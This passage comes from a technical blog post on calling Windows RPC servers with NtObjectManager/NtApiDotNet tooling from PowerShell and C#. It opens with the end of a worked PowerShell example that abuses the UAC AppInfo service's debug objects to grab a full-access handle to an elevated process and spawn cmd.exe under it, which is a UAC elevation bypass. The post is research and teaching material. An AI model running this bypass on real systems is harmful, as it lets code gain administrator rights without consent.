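    )
    $elevated = Start-Uac $Executable -RunAsAdmin
    foreach ($dbg in $DebugObjects) {
        # Only the debug object reused by the servicing thread has the initial
        # create-process event queued; the others just time out.
        try {
            $ev = Start-NtDebugWait -Seconds 1 -DebugObject $dbg
        } catch {
            $ev = $null
        }
        if ($null -eq $ev -or $null -eq $ev.Process) { continue }

        # The event's handle lacks PROCESS_SUSPEND_RESUME, so duplicate the
        # pseudo-handle (-1) out of the elevated process for a full-access handle,
        # then detach so the process outlives the debug object.
        $full = Copy-NtObject -SourceProcess $ev.Process -SourceHandle ([IntPtr]-1)
        Remove-NtDebugProcess $dbg -Process $full
        return $full
    }
    # Race lost: the elevated call landed on a thread we never primed.
    throw "Elevated process $($elevated.ProcessId) used a debug object that was not captured; retry with more attempts"
}

# Usage (replaces steps 7 and 8; step 9 is unchanged):
#   $dbgs  = Get-UacDebugObjects
#   $new_p = Get-ElevatedProcessHandle -DebugObjects $dbgs
#   New-Win32Process "cmd.exe" -ParentProcess $new_p -CreationFlags NewConsole
```

The one-second timeout per object is a trade-off: the event for the winning object is already queued when the wait starts, so a short timeout is enough, but a zero timeout as in step 8 would make the loop sensitive to the order in which the objects are checked.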

That’s the end of the worked example. Hopefully it gives you enough information to get up to speed with the tooling and to use it effectively in PowerShell.
Using RPC Clients from C#
To finish this blog post, I just wanted to highlight how you’d go about using this tooling from C# rather than PowerShell. The simplest way of getting a C# file to compile is to use the Format-RpcClient command in PowerShell or the RpcClientBuilder class from C# to generate it from a parsed RPC server. In PowerShell it’s trivial to parse multiple executables in a directory then generate clients for every server using the following example which parses all system32 DLLs and generates individual C# files in the output path:

$rpcs = ls "c:\windows\system32\*.dll" | Get-RpcServer
$rpcs | Format-RpcClient -OutputPath "cs_output"

You can then take the C# files you want and add them to a Visual Studio project, or manually compile them. You will also need to pull in the NtApiDotNet library from NuGet to get the general Local RPC client code. It should even work in .NET Core, although obviously it won’t work on any platform but Windows.

To use a client you can write the following C# code. The using statement depends on the Interface ID and version of the RPC server.

using rpc_201ef99a_7fa0_444c_9399_19ba84f12a1a_1_0;

Client client = new Client();
client.Connect();
// Verbatim string: a normal C# literal would treat \w, \s and \n as escapes.
client.RAiLaunchAdminProcess(@"c:\windows\system32\notepad.exe", ...);

There are a few additional options you can pass to Format-RpcClient to change the generated output, such as specifying the namespace and client name, as well as options to return the out parameters in a structure as used in PowerShell. As generating all clients is somewhat time consuming, especially if you wanted to do it for all supported versions of Windows and to resolve public symbols for names, I’ve done it for you. The WindowsRpcClient project on Github has pre-generated clients for Windows 7, Windows 8.1 and Windows 10 1803, 1903 and 1909. As the code is automatically generated it doesn’t have any specific license, although you’ll need to use the NtApiDotNet library as well.